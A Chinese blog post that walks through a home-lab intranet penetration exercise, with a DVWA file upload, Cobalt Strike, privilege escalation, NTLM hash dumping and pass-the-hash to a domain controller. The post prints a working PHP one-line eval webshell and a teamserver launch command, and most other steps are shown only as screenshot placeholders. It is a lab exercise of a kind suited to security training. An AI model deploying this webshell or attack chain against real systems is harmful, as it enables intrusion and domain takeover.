内网渗透、哈希传递、获取域控权限

已于 2023-12-15 18:22:58 修改
阅读量570 收藏 8
点赞数 11
分类专栏: 内网 文章标签: web安全 网络安全 安全 笔记
于 2023-12-15 18:17:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51559599/article/details/135023160
版权

网络拓扑

  • kali(桥接)

    10.9.47.221

  • win11(nat 模式)

    192.168.1.130

  • DMZ(win7)

    网卡1(桥接)10.9.47.110

    网卡2(仅主机)172.16.1.128

  • 域控(win 2008)(仅主机)

    172.16.1.129

要求

  1. 域控主机搭建域环境,DMZ 主机加⼊域内
  2. DMZ 主机存在⽂件上传漏洞和命令执⾏漏洞
  3. 获取 DMZ 主机控制权限,写⼊⼀句话⽊⻢或者上传⼀句话⽊⻢并连接
  4. cs ⽣成⽊⻢,使 DMZ 主机上线 cs
  5. 提权到 system 权限,⽣成 smblistener
  6. 使⽤哈西传递操作横向移动到预控,拿下预控权限
  7. 搭建正向代理,在 win11 上直接访问到预控主机的服务,例如 3389 或者 web

获取 webshell

使用 dvwa 文件上传模拟漏洞

准备一句话木马

1.php

<?php @eval($_REQUEST['gjl']);?>

访问 DMZ(win7)

10.9.47.110/dvwa

调到 low 模式上传一句话木马

image-20231215163306439

蚁剑连接

image-20231215163436698

Cobalt Strike 环境搭建

cs 服务端搭建、登录

kali 开启 teamserver

./teamserver 10.9.47.221 123456

image-20231215163530949

win11 开启客户端

image-20231215163806915

提权

image-20231215163911879

选择监听模块并生成

image-20231215164003064

使用蚁剑将木马上传到 DMZ 上

image-20231215164103533

使用蚁剑打开命令终端运行该程序, DMZ 主机上线

artiface_x64.exe

此时 DMZ 主机还是普通用户权限

image-20231215173655972

提权到管理员

image-20231215173918060

image-20231215164517988

成功提权

image-20231215173941245

提权到 system

image-20231215174806081

image-20231215174823503

横向移动

抓取本地 ntlm hash

image-20231215174905099

image-20231215174925531

内网扫描

image-20231215175029211

image-20231215174232818

查看扫描出的内网主机

image-20231215174430517

哈希传递

image-20231215175336299

image-20231215175821466

选择刚刚创建的 smb 监听

image-20231215175847440

指定成功传递后与哪个主机做连接

image-20231215180326599

成功横向移动

image-20231215181440289

image-20231215181524180

gjl_
关注
  • 11
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
VB6获取文件哈值源代码
05-16
VB6获取文件哈值源代码,模块化,无第三方件,直接可用。
传递 (内渗透
认真走好每一小步
07-25 312
传递只有在相同密码的情况下有用!!!
渗透-哈传递
qq_45953122的博客
10-18 301
传递是能够在不需要账号明文密码的情况下完成认证的一个技术,比如NTLM Hash、LM Hash都不需要明文密码,因此都可以被称为Hash传递攻击。
渗透手法之哈传递
一个努力学习网安的小牛马
11-29 420
传递的手法
渗透——哈传递
来日可期的博客
10-09 1015
传递攻击(Pass The Hash)是基于 NTLM 认证缺陷的一种攻击方式,攻击者可以利用用户的密码哈值来进行 NTLM 认证。在环境中,大量计算机在安装时会使用相同的本地管理员账号和密码。如果计算机的本地管理员账号密码相同,攻击者就能使用哈传递攻击的手段登录到内中的其他计算机。
利用打印机窃取目标系统哈值.pdf
12-04
利用打印机窃取目标系统哈值,获取目标系统的高级权限,通过其他系统连接打印机的信息。络上的打印机的配置文件修改方法。
获取
01-29
HashHash 获取获取获取获取获取
pwdump8-8.2--获取Windows密码哈
10-29
最新的pwdump8-8.2--获取Windows密码哈,可以结合ophcrack使用(可以问我要最新的)
获取获取算法标识demo-java
12-18
提供了获取值接口、获取算法标识已经使用算法值接口源码,接口都是正式封装的,IDEA编译,输出结果符合官方数据
一表捋清络安全等级保护测评要求
weixin_45840241的博客
05-15 569
对于中小企事业单位来说,络安全建设是一个复杂且投入较高的过程,因此他们更倾向于寻找一种“省心省力”的等保建设方案,以及一种能够持续有效且具有较高性价比的络安全建设投入方式。通过采用等保一体机方案,客户能够根据自身需求定制所需的安全能力,例如等保二级能力与行为管理能力的结合,等保三级能力与远程安全接入能力的结合等。等保安全套餐方案一直致力于构建“一站式省时省力过等保,安全有效且具有高性价比”的优势,以更好地满足中小企事业单位的络安全建设需求。导致的安全设备闲置或无法满足等保要求等。
web安全之登录框渗透骚姿势,新思路
qq_47289634的博客
05-10 593
越权漏洞的挖掘大部分是通过对比两个用户的请求包以及响应包,来观察不同之处,有的时候替换一下响应包就直接越权,其中特别要关注的是uid,这里在挖掘逻辑漏洞和越权漏洞时建议使用burp中的compare模块进行两个数据包的比对,非常直观。width=500&height=100导致可以随意更改大小,配合脚本批量请求,很容易就会把带宽占满,造成dos攻击。不管漏洞挖掘还是挖SRC,登录框都是重点关注对象,什么漏洞都有可能出现,登录框也是框,见框就插就对了,说不定会有奇效。看到登录框,输入信息后,抓包。
Upstream最新发布2024年汽车络安全报告-百度盘下载
最新发布
qq_18209847的博客
05-20 197
Levy总结道:“在负责保护车队、电动汽车充电站和基础设施的络安全利益相关者中,对汽车络安全的重要性日益增加。特别是在GenAI日益普及的情况下,其降低了黑帽子行为者的进入门槛,使他们能够比以往更快、更有效地进行大规模攻击。这份报告的第六版着重介绍了汽车络安全的拐点:从实验性的黑客攻击发展到规模庞大的攻击,并产生了怎样的影响。另外今年的报告还提供了关于络攻击的财务影响的独到见解,它提供了一个可操作的框架,用于在现实场景中衡量络攻击的货币影响。
【实事】——《2024络安全报告》
weixin_65728773的博客
05-14 620
尽管如此,我们也必须做出改变,否则就会像2023年所看到的那样,领先的企业提早采用新技术,落后的企业努力跟上信任和安全基础能力的步伐,以及络生态系统内分散的激励机制,这些都将在未来几年加速数字鸿沟。在低收入的企业中,有52%的领导者表示,缺乏资源和技能是他们在设计络弹性时面临的最大挑战。56%的领导者表示,在未来两年内,生成式人工智能将成为络攻击者的工具。在不断变化的络安全环境中,地缘政治的不稳定性、技术的飞速发展以及企业络能力差距的日益扩大,都强化了建立络弹性和实现系统化全球协作的必要性。
了解络安全行业内有哪些公司?
aheyor的博客
05-14 922
https://wenku.baidu.com/view/8de38c790440be1e650e52ea551810a6f424c80f?aggId=f2f58cc8e618964bcf84b9d528ea81c758f52ecc&fr=catalogMain_text_ernie_recall_feed_index%3Awk_recommend_main4&_wkts_=1715651666515&bdQuery=%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85
CTF如何学习?
小司机的奥拓
05-14 917
作和项目会带来影响,毕竟你不可能打一辈子的CTF,而CTF和实战还是有区别,过度沉浸于CTF的模式当中会让你在实战中却无从下手**
站有存在哪些类型的漏洞,站漏洞存在哪些危害,该怎么解决站漏洞问题
dexunyun的博客
05-14 365
通过使用漏洞扫描VSS服务,我们可以及时发现站存在的漏洞,有效降低站漏洞的风险,保障站安全,满足合规要求。文件上传漏洞是由于站在处理文件上传功能时没有对上传的文件类型、大小等进行严格的验证和过滤,攻击者利用站中的文件包含函数,将恶意文件或代码包含到站中,从而实现远程代码执行或文件读取。站安全是一个持续的过程,需要我们不断关注,通过及时发现存在的漏洞,我们可以针对性的处理,这样可以有效地减少站安全漏洞的产生和危害,确保站的安全稳定运行。同时,采用安全的编程语言和框架,减少漏洞的产生。
络安全】【Frida实战案例】某图xx付费功能逆向分析(一)
IT痴者
05-13 340
本次主要是日志分析,查看日志对应执行流程。查看关键信息。
DDoS攻击揭秘与站防护策略
网络安全服务提供商
05-14 760
DDoS攻击(分布式拒绝服务攻击)是一种利用大量被制的计算机或智能设备(如僵尸络)对目标站或服务器发起大量无效请求或数据流量,从而导致目标系统资源耗尽、服务崩溃或无法处理正常请求的攻击方式。这种攻击通常是由一个或多个攻击者发起,他们通过制大量被感染的计算机或设备,向目标系统发送大量看似正常的请求或数据,但实际上是为了消耗目标系统的资源,使其无法为正常用户提供服务。同时,还需要注意定期更新和修补系统漏洞、限制对敏感数据的访问以及加强员工安全意识培训等方面的工作。
PHP 查找所有哈
09-24
### 回答1: PHP 中可以使用函数 `array_keys()` 来查找所有哈表的键,例如: ``` $hashtable = array('a' => 1, 'b' => 2, 'c' => 3); $keys = array_keys($hashtable); print_r($keys); ``` 输出结果为: ``` Array ( [0] => a [1] => b [2] => c ) ``` 如果要查找所有哈表的值,可以使用函数 `array_values()`,例如: ``` $hashtable = array('a' => 1, 'b' => 2, 'c' => 3); $values = array_values($hashtable); print_r($values); ``` 输出结果为: ``` Array ( [0] => 1 [1] => 2 [2] => 3 ) ``` 如果要查找所有哈表的键和值,可以使用 `foreach` 语句遍历哈表,例如: ``` $hashtable = array('a' => 1, 'b' => 2, 'c' => 3); foreach ($hashtable as $key => $value) { echo "$key => $value\n"; } ``` 输出结果为: ``` a => 1 b => 2 c => 3 ``` ### 回答2: 要查找PHP中所有的哈表,可以使用遍历和递归的方法来实现。在PHP中,哈表可以通过数组表示。 首先,我们可以使用全局变量$GLOBAL来获取当前脚本中的所有变量。然后,使用foreach循环遍历$GLOBAL数组中的每个元素,判断每个元素是否为数组。 如果元素是数组,那么就可以确定它是一个哈表。我们可以再次使用foreach循环遍历这个数组,以获取表中的键和对应的值。 下面是一个示例代码: ```php function findHashTables($arr) { foreach ($arr as $key => $value) { if (is_array($value)) { echo "哈表:$key<br>"; foreach ($value as $k => $v) { echo "键:$k => 值:$v<br>"; } echo "<br>"; } } } findHashTables($GLOBALS); ``` 在这个示例代码中,我们定义了一个名为findHashTables的函数,它接受一个数组作为参数。我们将$GLOBAL数组传递给这个函数,以查找所有的哈表。 函数内部首先使用foreach循环遍历$GLOBAL数组,判断每个元素是否为数组。如果是数组,就打印出该数组的键和值。通过调用这个函数,我们可以找到当前脚本中的所有哈表。 需要注意的是,这个方法只能查找当前脚本中的哈表,如果要查找其他作用中的哈表,可以采用类似的方法,传递相应的数组参数即可。 ### 回答3: 在PHP中,你可以使用`get_defined_vars()`函数来查找所有的哈表。 哈表是一种关联数组,也称为字典或映射。在PHP中,哈表是使用关联数组实现的。 `get_defined_vars()`函数返回一个包含所有已定义变量的数组。它会返回一个包含多个元素的数组,每个元素对应一个已定义的变量,并存储了变量的名称和值。 要查找所有的哈表,你可以通过遍历`get_defined_vars()`返回的数组,并判断每个变量的类型是否为数组。如果是数组,则可以确定它是一个哈表。 下面是一个示例代码,展示如何使用`get_defined_vars()`函数查找所有的哈表: ```php $hashTables = array(); // 用于存储所有哈表的数组 // 遍历所有已定义的变量 foreach (get_defined_vars() as $var) { // 判断变量是否为数组类型 if (is_array($var)) { // 将数组(哈表)添加到结果数组中 $hashTables[] = $var; } } // 打印所有哈表 foreach ($hashTables as $hashTable) { print_r($hashTable); } ``` 以上代码将打印出所有的哈表。注意,这里只是对PHP中已定义的哈表进行查找,未定义的哈表不会被包含在结果中。 总结来说,通过使用`get_defined_vars()`函数和判断变量类型是否为数组,你可以很容易地查找所有的哈表。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gjl_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值